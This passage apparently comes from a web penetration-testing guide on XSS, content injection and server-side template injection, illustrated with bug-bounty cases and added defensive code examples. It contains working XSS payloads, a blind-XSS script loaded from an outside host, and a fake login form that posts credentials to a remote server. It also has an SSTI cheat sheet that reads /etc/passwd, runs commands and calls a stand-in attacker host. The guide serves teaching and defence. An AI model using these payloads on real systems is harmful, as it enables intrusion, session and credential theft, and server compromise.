In general, a comment feature consists of two parts: the comment form and the comment display page. The comment form receives input from the user, and that data is stored in the database. The comment display page, on the other hand, shows the users' comments retrieved from the database.

Looking more closely, it can be seen that the data held in the variables $name and $comment in the code above is neither filtered nor validated. If an attacker enters malicious code through the comment feature, that malicious code is stored in the database and shown on the comment page. The Stored XSS therefore executes exactly as the attacker expects: every user who opens the comment feature automatically loads the malicious code that was inserted.

For simplicity, the following is an example of the flow of a stored XSS attack aimed at taking the cookies of other users:

• The attacker injects malicious code into a particular feature of the website (for example, the comment feature explained earlier).

• When a visitor opens the page in question, the malicious code is executed on the visitor's side. This causes the visitor's cookie to be sent automatically to the attacker.

• Once the cookie has been retrieved, the worst-case effect is that the attacker is able to use it to log in without needing the visitor's username and password.

Figure 147 Stored XSS Simple Explanation

Note: picture taken from the Imperva blog.
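As an added example (not code from the book), here are the two PHP snippets above rewritten as plain Node.js functions, each in its vulnerable form and in a hardened form that encodes the data at the output sink. The names escapeHtml, renderSearchPage, CommentStore and containsRawTag are assumptions of this example, and the sample comment is constructed from the first payload in section 14.2.

```javascript
// Added example, not code from the book. Assumed names: escapeHtml,
// renderSearchPageUnsafe/renderSearchPage, CommentStore,
// renderCommentPageUnsafe/renderCommentPage, containsRawTag, PROBE.

// Encode the five characters that let text break out of an HTML text or
// attribute context; the equivalent of PHP's htmlspecialchars($s, ENT_QUOTES).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Reflected case: `search` is the raw value of the GET parameter.
// Vulnerable form, the same behaviour as echo "Search " . $find above.
function renderSearchPageUnsafe(search) {
  return "<p>Search " + search + "</p>";
}

// Hardened form: the same page, but the value is encoded at the output sink.
// (Validation on input is still worthwhile; encoding on output is what stops XSS.)
function renderSearchPage(search) {
  return "<p>Search " + escapeHtml(search) + "</p>";
}

// Stored case: an in-memory stand-in for the tb_komentar table, constructed
// for this example so it runs without MySQL.
class CommentStore {
  constructor() { this.rows = []; }
  add(name, comment) { this.rows.push({ name: name, comment: comment }); }
  all() { return this.rows.slice(); }
}

// Vulnerable form: every stored row is concatenated into the page as-is,
// so a payload saved once fires for every reader of the comment page.
function renderCommentPageUnsafe(store) {
  return store.all()
    .map(row => "<li><b>" + row.name + "</b>: " + row.comment + "</li>")
    .join("\n");
}

// Hardened form: storing the raw text is fine; it is encoded when rendered,
// and it must be encoded on every page that shows it (front end and back end
// alike, which is what the blind XSS case in 14.3.3 is about).
function renderCommentPage(store) {
  return store.all()
    .map(row => "<li><b>" + escapeHtml(row.name) + "</b>: " + escapeHtml(row.comment) + "</li>")
    .join("\n");
}

// A check for tests or for reviewing a response: did a tag from the input
// survive into the rendered HTML as a real tag?
function containsRawTag(html, tagName) {
  return new RegExp("<" + tagName + "[\\s>/]", "i").test(html);
}

// Constructed sample input: the first basic payload listed in section 14.2.
const PROBE = "<script>alert('xss');</script>";

const demoStore = new CommentStore();
demoStore.add("alice", "nice post");
demoStore.add("mallory", PROBE);
console.log(renderSearchPageUnsafe(PROBE)); // the <script> tag survives
console.log(renderSearchPage(PROBE));       // &lt;script&gt;... is shown as text
console.log(renderCommentPageUnsafe(demoStore));
console.log(renderCommentPage(demoStore));
```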

14.1.3. Dom-Based Cross Site Scripting

Based on the information published by PortSwigger, briefly, DOM-Based Cross Site Scripting (DOM XSS) is a type of XSS that arises when an application has client-side JavaScript that processes data from an untrusted source in an unsafe way. In short, the execution takes advantage of client-side scripts that already exist on the client side itself.

Quoting from Netsparker on DOM XSS, say that an application has the following script:

<script>
document.write("<b>Current URL</b>: " + document.baseURI);
</script>

Based on the above, if a tester sends a request with an injection added, such as http://www.xyz.com/test.html#<script>alert(1)</script>, then the pop-up alert is executed automatically.

It should be noted that the alert(1) will not appear in view-source. The reason is that everything happens in the DOM (Document Object Model), and alert(1) is executed by the JavaScript that is already there.


Figure 148 Sample Flow of Dom-Based XSS

Note: picture taken from the article by Christopher Makarem, which also explains DOM-Based XSS in detail.

As with the impact described in the previous sections on Reflected and Stored XSS, a DOM XSS vulnerability can also be used to steal cookies from a user's browser or to change the behaviour of the web page as the attacker wishes. The figure gives an overview of a DOM XSS attack.

14.2. Basic Concept of Cross Site Scripting Attack

In general, a tester needs to look for input and output features in an application in order to launch an XSS attack. Some examples of features that have both input and output are the search feature, the comment feature, chat, ticketing features, and the like.

The next thing to do after finding such a feature is to provide input in the form of a basic XSS payload that (for example) produces a pop-up alert. Some payloads that are often used in the early stage of XSS testing are as follows:

1. <script>alert('xss');</script>

2. <img src=x onerror=alert('xss')>

3. <svg onload=alert('xss')>

4. <iframe src="javascript:alert('xss')">

5. javascript:alert('xss')//


When these payloads are executed, a vulnerable application produces a result as simple as the following:

Figure 149 Pop-Up Alert Sample

In practice, there are of course many more payloads that can be used, especially when specific characters are needed to bypass the various kinds of protection applied to the application. Here are a few payload collections that can serve as a reference:

• https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html

• https://github.com/ismailtasdelen/xss-payload-list

• https://github.com/pgaijin66/XSS-Payloads/blob/master/payload.txt

14.3. Sample Cases

14.3.1. Reflected Cross Site Scripting - Shopify Case

In October 2018, a researcher with the nick dr_dragon found a reflected cross-site scripting issue in the Shopify application. In that situation, the vulnerability was found in the "return_url" parameter, which allowed him to inject a script into it.

On that occasion, he used a simple payload that generates a prompt showing the domain name, as follows:

Payload: javascript:prompt(document.domain)//

Vulnerable parameter: return_url

Complete URL:

https://<any>.myshopify.com/admin/authenticate?return_url=javascript:prompt(document.domain)//


When executed, the output is:

Figure 150 Output from Triggered Script

To corroborate that the finding is indeed risky, he tried to show cookie information that could be pulled (of course, in this case he reflected his own cookie, using a payload armed with document.cookie):

https://<any>.myshopify.com/admin/authenticate?return_url=javascript:prompt(document.cookie)//

Figure 151 Output from Triggered Script - document.cookie


It should be noted that this is called reflected XSS because the script inserted by the researcher is not stored in the database. Even so, it was enough to get Shopify's attention and have the susceptible parameter fixed.

14.3.2. Stored Cross Site Scripting - Snapchat Case

In July 2017, a researcher with the nick mrityunjoy discovered a Stored XSS issue on one of Snapchat's endpoints. In that situation, he found that the endpoint https://ads.snapchat.com/setup had an issue in the "business name" parameter.

To identify the gap, the first step taken was to enter a simple HTML snippet of the form <font color='red'>HTML_injection</font>. If the parameter is vulnerable, the text HTML_Injection will be reflected in red.

Figure 152 Trying to Inject the Simple HTML Script

Given that the injection was done during the process of creating an organization, he completed that process first. Once it was complete, he tried to invite a user, so that the output resulting from the injection would be shown.

Figure 153 Inviting other Member


Long story short, it turned out that the member who received this email saw the text HTML_Injection in red.

Figure 154 Script has been Reflected via Email

When "Join" is selected, the user is presented with a page for entering a name, which again shows the reflection of the injection. The best part is that this text is stored in the database, so the tester does not need to send any custom link to the script at all.

Figure 155 Script has been Reflected at the Page (and Stored at the Database)

Seeing that the script was reflected "well", he replaced the injected payload with one that could lead to further interaction, namely JavaScript (rather than just a simple HTML snippet). As it happened, this script was also triggered "very well".


Payload: test"><img src=x onerror=prompt(document.domain)>

Figure 156 Domain Information has been Reflected via Javascript

14.3.3. Blind Cross Site Scripting - Tokopedia Case

Technically, Blind Stored XSS is similar to XSS in general. The difference is that in blind XSS the tester cannot see the result of the execution, because the injected script is (generally) triggered in the backend, or on a display that the tester cannot reach.

For example, consider a simple registration application that has a backend which can only be accessed internally by the application's managers. In this backend, the manager can see information such as the data registered by users from the front end.

At some point, a tester injects a simple pop-up alert into the first name. However, the reflection of the first name on the front end has been filtered, so no pop-up window appears. Yet the first name turns out to be reflected in the backend application as well, so well that when a manager wants to see the registration data of that user, the manager is faced with a pop-up alert.

The condition in which a tester cannot see the situation in the backend is what is called Blind XSS. So how can this be worked around? In practice, testers can use a well-known tool to force an "encounter" between the manager in the backend and the tester in the front end. One fairly well-known tool for this is XSS Hunter (https://xsshunter.com).

To get a clearer picture, we will discuss one interesting Blind XSS case that the noobsec team found in one of Tokopedia's features. In that situation, noobsec tried to inject a script (using XSS Hunter) into


the "name" field of the product complaint feature that visitors can reach via the link https://www.tokopedia.com/contact-us/form/ban-product.

Payload: Anu"><script src=//xxs.ht></

Figure 157 Trying to Inject the XSS Hunter Script at Name Field

Given that this data is surely stored in the database and will surely be reviewed internally, the only thing to do is wait for the script to be executed in the backend (with the caveat, of course, that there is a separate backend and that the feature where the reflection occurs is indeed vulnerable).

After a while, the noobsec team found that the script had indeed been reflected well in the backend when it was reviewed by the Tokopedia team. This was evident from the notification on the XSS Hunter dashboard used by the noobsec team, which shows information such as the victim's IP, screenshots, and several other items.

Figure 158 Notification at XSS Hunter Dashboard


To be sure, the noobsec team also looked at the screenshot. From the screenshot, it could be seen that there was indeed a vulnerable backend dashboard on Tokopedia's side.

Figure 159 Internal Dashboard of Tokopedia - Show with Blind XSS

14.3.4. Dom Based Cross Site Scripting - Twitter Case

In December 2017, a researcher with the nick harisec found a DOM-Based XSS issue on Twitter. He explained that the issue on help.twitter.com was persistent through the localStorage key lastArticleHref. It should be noted that the value of this localStorage key was used to generate HTML code dynamically without any filtering. Given that no filtering was applied, a tester could trigger a client-side script through it.

In that situation, the susceptibility was found to be located in the JavaScript file https://help.twitter.com/etc/designs/help-twitter/public/js/homepage.js. Inside it there are two localStorage key parameters, lastArticleBreadcrumbs and lastArticleHref.

The parameter lastArticleBreadcrumbs contains an array of breadcrumbs, for example ["Help Center", "Following and unfollowing", "How to approve or deny follower requests"]. The parameter lastArticleHref, on the other hand, contains the URL of the last visited article. The following is the piece of code that is vulnerable to DOM XSS:

this.lastArticleBreadcrumbs.shift();

var t = this.lastArticleBreadcrumbs.map(function (t, r) {
    return r === e.lastArticleBreadcrumbs.length - 1
        ? '<a class="hp03__link tWTR-type--roman-16" href="' + e.lastArticleHref + '">' + t + '</a>'
        : '<span class="hp03__breadcrumb tWTR-color--light-gray-neutral">' + t + '</span>';
});

this.breadcrumbElement.innerHTML = t.join('<span class="hp03__seperator tWTR-color--light-gray-neutral"> / </span>');

As seen in the script fragment above, there is a piece of HTML code that is generated dynamically.

It can be seen that for the parameter lastArticleHref, the application does not perform proper encoding when generating the HTML code dynamically. This in turn allows a tester to inject additional HTML into the browser's DOM by manipulating the value of the localStorage key.

A simple example is when the tester sends the URL https://help.twitter.com/en/using-twitter/follow-requests#"><zzzz> and the victim opens it. When that link is accessed, the value of the localStorage key lastArticleHref becomes https://help.twitter.com/en/using-twitter/follow-requests#\"><zzzz>. Afterwards, when the victim visits the page https://help.twitter.com/, the value of the localStorage key lastArticleHref is loaded and used to generate HTML that is written into the DOM. At this point, the HTML code defined by the attacker is displayed on the page https://help.twitter.com/.

In the attack designed by the researcher, he injected HTML code containing a fake login form. The hope is that the victim is fooled and enters the username and password of their Twitter account. As for the implementation, the following is the payload used by the attacker to carry out the DOM attack against other Twitter users:

https://help.twitter.com/en/using-twitter/follow-requests#"></a></div></div></div></div></div></div></div></div></div></div></div></div><br><br><br><br><div style="background:#97e3ff; position:fixed; top:80%; left:50%; margin-top:-50px; margin-left:-150px; border-style:double;">Please sign in below: <form action=https://bugs.thx.bz/just>username: <input type=text name=u> password: <input type=password name=p> <input type=submit value='Sign In'></form></div>


When the URL in question is accessed by the victim, the victim sees the following:

Figure 160 Script Executed at Client Side by Using Dom-Based Vulnerability
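As an added example (not the book's or Twitter's code) covering both the document.baseURI script in 14.1.3 and the breadcrumb builder in this case: the string-concatenation form is shown beside a version that validates the stored href and builds the breadcrumb through DOM nodes instead of innerHTML. HELP_ORIGIN, isAllowedArticleHref, renderBreadcrumbs and the FakeDocument stub (which stands in for the browser's document so the code runs under Node) are assumptions of this example; the href used is the "><zzzz> URL from this case.

```javascript
// Added example, not the book's or Twitter's code. Assumed names: HELP_ORIGIN,
// buildBreadcrumbsUnsafe, isAllowedArticleHref, renderBreadcrumbs,
// FakeElement, FakeDocument, SAMPLE_CRUMBS, SAMPLE_HREF.

const HELP_ORIGIN = "https://help.twitter.com"; // origin a stored href must belong to

// Vulnerable form, equivalent to the homepage.js fragment above: the labels
// and the href read back from localStorage are concatenated into HTML, so a
// href ending in "><zzzz> closes the attribute and adds a new element.
function buildBreadcrumbsUnsafe(crumbs, href) {
  return crumbs.map((label, i) =>
    i === crumbs.length - 1
      ? '<a class="hp03__link" href="' + href + '">' + label + "</a>"
      : '<span class="hp03__breadcrumb">' + label + "</span>"
  ).join('<span class="hp03__seperator"> / </span>');
}

// Layer 1: a value pulled from localStorage (or location, like document.baseURI
// in 14.1.3) is untrusted input. Accept it as a link target only if it parses as
// an https URL on the expected origin; this rejects "javascript:" URLs (the
// return_url pattern from the Shopify case) and foreign origins, while an odd
// fragment alone is not a reason to reject.
function isAllowedArticleHref(href) {
  let url;
  try { url = new URL(href); } catch (e) { return false; }
  return url.protocol === "https:" && url.origin === HELP_ORIGIN;
}

// Layer 2: build the breadcrumb with createElement/textContent/setAttribute.
// Values become node data, never markup, so "><zzzz> is rendered as text.
// `doc` is the real document in a browser; here the stub below is used.
function renderBreadcrumbs(doc, container, crumbs, href) {
  container.textContent = ""; // drop any previous children
  crumbs.forEach((label, i) => {
    if (i > 0) {
      const sep = doc.createElement("span");
      sep.setAttribute("class", "hp03__seperator");
      sep.textContent = " / ";
      container.appendChild(sep);
    }
    const last = i === crumbs.length - 1;
    const el = doc.createElement(last ? "a" : "span");
    el.setAttribute("class", last ? "hp03__link" : "hp03__breadcrumb");
    el.textContent = label;
    if (last) {
      // fall back to the help-centre root when the stored value is not acceptable
      el.setAttribute("href", isAllowedArticleHref(href) ? href : HELP_ORIGIN + "/");
    }
    container.appendChild(el);
  });
  return container;
}

// Minimal stand-in for the browser DOM so the example runs under Node. It
// supports only what renderBreadcrumbs uses; serialize() shows the outcome the
// way a browser serialises a node tree (text and attribute values escaped).
class FakeElement {
  constructor(tag) { this.tag = tag; this.attrs = {}; this.children = []; this.text = ""; }
  set textContent(value) { this.text = String(value); this.children = []; }
  get textContent() { return this.text; }
  setAttribute(name, value) { this.attrs[name] = String(value); }
  appendChild(child) { this.children.push(child); return child; }
  serialize() {
    const esc = s => s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
    const attrs = Object.entries(this.attrs).map(([k, v]) => " " + k + '="' + esc(v) + '"').join("");
    const inner = esc(this.text) + this.children.map(c => c.serialize()).join("");
    return "<" + this.tag + attrs + ">" + inner + "</" + this.tag + ">";
  }
}
class FakeDocument { createElement(tag) { return new FakeElement(tag); } }

// Constructed sample: the breadcrumbs from the write-up and the "><zzzz> href.
const SAMPLE_CRUMBS = ["Help Center", "Following and unfollowing", "How to approve or deny follower requests"];
const SAMPLE_HREF = 'https://help.twitter.com/en/using-twitter/follow-requests#"><zzzz>';

const demoDoc = new FakeDocument();
console.log(buildBreadcrumbsUnsafe(SAMPLE_CRUMBS, SAMPLE_HREF)); // contains a live <zzzz> element
console.log(renderBreadcrumbs(demoDoc, demoDoc.createElement("div"), SAMPLE_CRUMBS, SAMPLE_HREF).serialize());
```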

14.4. Reference of Cross Site Scripting

Cross Site Scripting is a well-known issue with many variants, both in terms of payloads and in terms of execution. The few things presented in this guide can be said to be of a basic nature that can still be developed further. With that in mind, testers are expected to read many of the related write-ups that have been released by many researchers.

As a complement to the explanation given, here are some references that can be consulted regarding XSS:

• Rapid7 tCell application security report: https://www.rapid7.com/globalassets/_pdfs/whitepaperguide/rapid7-tcell-application-security-report.pdf

• OWASP TOP 10 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

• OWASP TOP 10 2017 A7-Cross Site Scripting: https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)

• Cross Site Scripting: https://portswigger.net/web-security/cross-site-scripting

• Cross Site Scripting: https://www.veracode.com/security/xss

• Testing For Reflected Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

• Testing For Stored Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)

• Testing For DOM Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)

• Stored Cross Site Scripting Attacks: https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/

• Reflected Cross Site Scripting: https://shieldfy.io/security-wiki/cross-site-scripting-xss/reflected-xss

• DOM Cross Site Scripting: https://medium.com/iocscan/dom-based-cross-site-scripting-dom-xss-3396453364fd

• Reflected XSS Shopify: https://hackerone.com/reports/422707

• Stored XSS on Snapchat: https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd

• Persistent DOM-based XSS in https://help.twitter.com via localStorage: https://hackerone.com/reports/297968

• XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

• Blind XSS on Tokopedia Internal Panel: https://noobsec.org/project/2018-11-23-blind-xss-in-internal-panel-Tokopedia/


15. CONTENT INJECTION

There will be times when the application being tested reflects a certain user input, but the result of the reflection is limited, for example it can only reflect plain text or simple HTML, without script execution.

When this reflected text comes with the possibility of presenting "false information" that looks convincing enough from the user's side, the application can be said to have a vulnerability of the Content Injection kind.

15.1. Basic Concept of Content Injection

Simply put, content injection is a type of attack that takes advantage of missing input validation in an application (for both the POST and GET methods). Quoting from OWASP, in general this attack is closely related to social engineering attacks, because exploiting it requires two things at once: exploiting a vulnerability in the code, and taking advantage of the victim's trust.

In practice, Content Injection is always "cultivated" by the tester into a display carrying a convincing message that can deceive visitors.

Figure 161 Sample of Content Injection with Text

So what is the difference from XSS, which seems to provide the same impact? This is perhaps one of the questions that testers may ask. The fundamental difference between Content Injection and XSS is that Content Injection requires two steps for a successful execution to happen.

For example, say a tester wants to make a victim visit the link evil.com. In an XSS attack, the tester can automate the "move" of the victim to evil.com with simple JavaScript. In other words, after the victim visits the link (for example, in the form of reflected XSS), the victim is moved to evil.com automatically because the JavaScript executes.


In contrast to XSS, Content Injection still requires one more step that must be "done" by the victim, namely manually clicking the evil.com link shown on the page the victim sees. If the victim does not click, the "transfer" never happens automatically.

15.2. Kind of Content Injection

In general, there are two kinds of Content Injection that are commonly found, namely text-based and HTML-based.

Using the same example of a tester who wants to push the victim to "move" from one link to evil.com:

• In Text Injection, the victim has to manually copy and paste the evil.com link that they see on the page. Whereas

• In HTML Injection, the victim only needs to click the link directly in order to "make the move" to evil.com.

15.2.1. Text Injection - SEMRush and LocalTapiola Case

As discussed previously, in broad outline, Text Injection carries a much smaller risk than HTML Injection. This is because with text injection the victim is "obliged" to manually copy and paste whatever the tester "desires". If they do not, the hoax certainly cannot happen.

Some interesting examples of this issue are the ones discovered by the researcher named asad_anwar on the SEMRush program and the researcher with the nick ak1t4 on the LocalTapiola program. In both cases, the error message shown by the application reflected the text that had been entered into the link.

Figure 162 Text Injection at SEMRush Program - https://hackerone.com/reports/327671


Figure 163 Text Injection at LocalTapiola - https://hackerone.com/reports/181594

As seen, the victim must first copy and paste manually in order to actually visit the evil.com link that the tester inserted.

15.2.2. HTML Injection

As noted earlier, "the best thing" about HTML Injection is that the victim only needs to click directly, without having to copy and paste as with Text Injection.

In practice, the tester only needs to enter an HTML snippet as simple as a heading, <h1></h1>. When the output of this injection shows a change in font size (larger, because of the h1 tag), the application can automatically be said to be vulnerable to HTML Injection. Of course, besides the h1 tag, the tester can also use other tags such as marquee, font color, and the like.

Some interesting examples in this regard are the ones found by the researcher with the nick 0x0luke on the program owned by Slack, and the researcher with the nick nihadrekanym on the program owned by Infogram.

15.2.2.1. Common HTML Injection - Infogram Case

In the program owned by Infogram, nihadrekanym found that the "Employee ID" field did not validate its input, which allowed him to insert an HTML snippet. The best part is that the reflection of this injection could be seen directly in the existing interface. The simple payload entered was the h1 heading itself:

<h1>hacked</h1>


Figure 164 HTML Injection at Infogram - https://hackerone.com/reports/283742

15.2.2.2. HTML Injection (Output has been Triggered via Email) - Slack Case

In contrast to the Infogram case, where the output of the injection could be seen directly on the front end, in the Slack case 0x0luke found that the output of the execution was visible via email.

In the trial, the "first name" field did not validate its input, which allowed him to insert an HTML snippet. However, the reflection of this injection is seen through email, so it is triggered "well" when the tester is in the same team as other members.

As a form of trial, 0x0luke inserted a simple tag such as <img>, and then tried to perform an action that makes Slack send an email automatically.

Figure 165 HTML Injection at First Name - Triggered at Email


As can be seen, the <img> tag was executed "well".

As a further step in the execution, a tester can give the email in question a convincing appearance (armed with an HTML snippet that can be triggered) to trick members who are in the same group as the tester.

15.3. Reference of Content Injection

Although Content Injection is considered a fairly low issue, there is no doubt that it is still taken into account by most companies, for a variety of considerations.

A few references that can be consulted for this discussion are:

• Content Spoofing: https://www.owasp.org/index.php/Content_Spoofing

• [SEMRush] Error Page Content Spoofing or Text Injection: https://hackerone.com/reports/327671

• [LocalTapiola] Error Page Content Spoofing or Text Injection: https://hackerone.com/reports/181594

• [Harvest] Text and HTML Injection at First and Last Name Parameters: https://hackerone.com/reports/152577

• [Slack] HTML Injection Inside Slack Promotional Emails: https://hackerone.com/reports/321029

• [Infogram] HTML Injection at Employee ID: https://hackerone.com/reports/283742


16. SERVER SIDE TEMPLATE INJECTION (SSTI)

Quoting from the detailed paper titled Server-Side Template Injection: RCE for the modern webapp, written by James Kettle, he explains that template engines are widely used by web-based applications to present dynamic data through web pages and email.

In general, there are several template engines that are quite popular among developers, such as:

• Jinja, Mako and Tornado (using the Python programming language)

• Smarty and Twig (using PHP)

• Jade and Rage (using the JavaScript programming language)

• Liquid (using the Ruby programming language)

• Velocity and FreeMarker (using the Java programming language)

However, as good as a template engine may be, if its use is not accompanied by proper validation it can pose a potential issue. In this case, injection into a template engine (with an impact on the server side) is closely linked to the vulnerability named "Server-Side Template Injection". In practice, this attack can be used directly to attack the internals of the web application, and it can often be developed into RCE (Remote Code Execution).

16.1. Server Side Template Injection 101

Still in the same paper, James explains that there is a methodology to efficiently identify vulnerabilities associated with server-side template injection. The methodology consists of several steps, namely detection and identification, followed by an exploitation process that starts with reading the documentation, then exploration, and finally the attack itself. The following is the diagram of this process created by James Kettle in his paper:


Figure 166 SSTI Methodology - SSTI: RCE for Modern Web App by Portswigger

16.1.1. Detection

In the initial phase, the tester must perform detection. For detection, testers can use a browser tool such as Wappalyzer, which helps identify the technologies used in an application.

Wappalyzer itself can be downloaded from the official page https://www.wappalyzer.com/. Once it is installed in the browser, the Wappalyzer icon appears near the address bar; when clicked, it displays information such as that shown in the picture below:

Figure 167 The Use of Wappalyzer

Besides Wappalyzer, testers can also use a tool called BuiltWith, which can be accessed on the official page https://builtwith.com. The output generated by this tool is quite complete, as shown in the following figure:


Figure 168 The Use of the BuiltWith Tool

After learning which technology is used, the next step is for the tester to try a manual injection with simple fuzzing. An example is a multiplication payload such as {{7*7}}. When an application is vulnerable to injection, it will display the output 49, which may appear directly or indirectly (for example, through email). Why 49? Simply because the template engine processes the arithmetic operation (a basic multiplication of 7 by 7).

And of course the other way around: if the application is not vulnerable, it will just display output matching the input, namely {{7*7}}.
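As an added example (not from the book or from James Kettle's paper), here is a toy {{ }} template engine that shows why the {{7*7}} probe turns into 49, and what separates the vulnerable usage (user data pasted into the template source) from the safe one (user data passed as context). The names renderTemplate, greetUnsafe, greetSafe and classifyProbeResponse are assumptions of this example; the toy engine evaluates only integer sums and products plus variable lookup, which is enough to reproduce the probe.

```javascript
// Added example, not the book's code. Assumed names: TAG, evaluateTag,
// renderTemplate, greetUnsafe, greetSafe, classifyProbeResponse.

// A {{ ... }} tag, with the expression inside captured.
const TAG = /\{\{\s*([^}]*?)\s*\}\}/g;

// Evaluate the tiny expression language inside a tag: either a variable name
// looked up in ctx, or integers joined by + and * (e.g. "7*7", "7 * 7 + 1").
// Anything else is rejected; a real engine accepts far more than this.
function evaluateTag(expr, ctx) {
  if (/^[A-Za-z_]\w*$/.test(expr)) {
    return Object.prototype.hasOwnProperty.call(ctx, expr) ? String(ctx[expr]) : "";
  }
  if (!/^\d+(\s*[*+]\s*\d+)*$/.test(expr)) {
    throw new Error("unsupported expression: " + expr);
  }
  // products bind tighter than sums
  return String(expr.split("+")
    .map(term => term.split("*").map(n => parseInt(n, 10)).reduce((a, b) => a * b, 1))
    .reduce((a, b) => a + b, 0));
}

// Render a template string against a context object. The value returned for
// a tag is inserted as text and is not scanned for tags again.
function renderTemplate(template, ctx) {
  return template.replace(TAG, (_, expr) => evaluateTag(expr, ctx));
}

// Vulnerable usage: the user-supplied value is pasted INTO the template
// source, so any {{ }} tags it contains are evaluated by the engine. This is
// the situation the {{7*7}} probe detects.
function greetUnsafe(name) {
  return renderTemplate("Hello " + name + "!", {});
}

// Safe usage: the template is a fixed string written by the developer and the
// user value enters only as context data, so its braces are just text.
function greetSafe(name) {
  return renderTemplate("Hello {{ name }}!", { name: name });
}

// The detection step from 16.1.1 as a function over a response body:
// "evaluated" when 49 came back, "not evaluated" when the probe was echoed
// literally, "inconclusive" when neither is present.
function classifyProbeResponse(body) {
  if (/\{\{\s*7\s*\*\s*7\s*\}\}/.test(body)) return "not evaluated";
  if (/\b49\b/.test(body)) return "evaluated";
  return "inconclusive";
}

console.log(greetUnsafe("{{7*7}}")); // Hello 49!
console.log(greetSafe("{{7*7}}"));   // Hello {{7*7}}!
console.log(classifyProbeResponse(greetUnsafe("{{7*7}}"))); // evaluated
```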

16.1.2. Identification

After successfully detecting that a vulnerability exists, the next step is to identify the template engine used by the target application. Below is the decision tree made by James Kettle to help identify the template engine in use.

A sample reading: when a tester performs the injection using the payload {{7*7}} and gets the output 49, then the template engine used is likely Jinja2 or Twig. And so on, as shown in the following figure:

Figure 169 Decision Tree to Identify the Template Engines - by James Kettle

16.1.3. Exploitation

The last stage is, of course, exploitation.

The exploitation stage is generally divided into three steps: the reading process, the exploration process, and the process of carrying out the attack.

As seen, the first step the tester needs to do is read the documentation of the template engine used in the target application. This process is useful for learning things such as the basic syntax and the relevant features of the template engine. This is of course expected to be a clue to the success of the exploitation process.

After that, the next process is exploration of the target environment, to find out exactly which things can be accessed and used. This exploration process can take the form of looking for the classes available within the template engine.

And the last step of this stage is the attack. The concept of the attack itself is quite diverse: payloads can be used to read files on the server (such as reading /etc/passwd), write files to the server, or even perform remote code execution.


Below is a collection of payloads that can be used to exploit server-side template injection vulnerabilities in a variety of template engines. As a quick note, these payloads can be obtained from the GitHub page of swisskyrepo, in PayloadsAllTheThings - Server Side Template Injection, which can be accessed at the following link:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Figure 170 Template Injection Cheat Sheets

Ruby

• Injection to identify SSTI: <%= 7*7 %>
• Injection to read the file /etc/passwd: <%= File.open('/etc/passwd').read %>
• Injection to list files and folders: <%= Dir.entries('/') %>

Java

• Injection to identify SSTI: ${7*7} and ${{7*7}}
• Injection to read the file /etc/passwd: ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
• Injection to get the system's environment variables: ${T(java.lang.System).getenv()}

Twig

• Injection to identify SSTI: {{7*7}} and {{7*'7'}}
• Injection for code execution: {{self}}, {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}, and {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Smarty

• Injection to identify SSTI: {{7*77}}
• Injection for code execution: {php}echo `id`;{/php}

Freemarker

• Injection to identify SSTI: ${3*3} and #{3*3}
• Injection for code execution: <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} and [#assign ex='freemarker.template.utility.Execute'?new()]${ex('id')}

Jinja2

• Injection to identify SSTI: {{7*77}}
• Injection to view the classes in use: {{config.items()}}, {{[].class.base.subclasses()}}, {{''.class.mro()[1].subclasses()}}, and {{''.__class__.__mro__[2].__subclasses__()}}
• Injection to see all config variables: {% for key, value in config.iteritems() %} <dt>{{ key|e }}</dt> <dd>{{ value|e }}</dd> {% endfor %}
• Injection to read a file: {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

16.2. Server Side Template Injection - Uber Case

On March 25, 2016, a researcher with the nick Orange found an SSTI vulnerability in a web application owned by Uber.

To identify the SSTI, Orange changed his profile name to {{'7'*7}}. If the feature was vulnerable, the application should return the output 7777777. Why that value? Because for the input in question, the string 7 is repeated 7 times, so the output becomes 7777777. If the feature is not vulnerable, the output will of course be the same as the input.

What is quite interesting here is that the vulnerability only became "visible" when Orange performed an action that made Uber send an email containing the injected profile name. On that occasion, the action taken was an attempt to update his Uber account. For more details, see the picture below:

Figure 171 Template Injection at Uber

The "Hi 7777777" part of the picture indicates that the injected payload {{'7'*7}} was executed successfully. From this, it can be concluded that the profile name parameter is susceptible to injection attacks.

Although Orange managed to obtain the desired output from simple fuzzing, unfortunately he did not manage to escalate the vulnerability to remote code execution. This was due to restrictions on the characters "acceptable" to Uber in the profile name field.

Even though escalation to RCE failed, Orange was still able to obtain the classes from the server using the payloads {{[].class.base.subclasses()}} and {{''.class.mro()[1].subclasses()}}. Below are the classes that were successfully retrieved through the SSTI attack.

Figure 172 Dumping the Classes via SSTI

In addition to displaying the classes available on the server, Orange also managed to execute code in the form of Python. The payload used to perform this action was {% for c in [1,2,3] %}{{c,c,c}}{% endfor %}

Figure 173 Trying to Execute Python Code


16.3. Server Side Template Injection - Intel Case

A researcher named Suleman Malik found an SSTI vulnerability in one of Intel's new web-based applications with an approach different from Orange's.

On that occasion, he found the vulnerability in the First Name and Last Name fields. In the First Name field he entered the payload sul{{9*9}}, while in the Last Name field he entered the payload malik{{9*9}}.

According to the theory described previously, if that part of the application is vulnerable to SSTI, the application will produce the value sul{{81}} malik{{81}}.

Figure 174 Trying to Put the Payloads

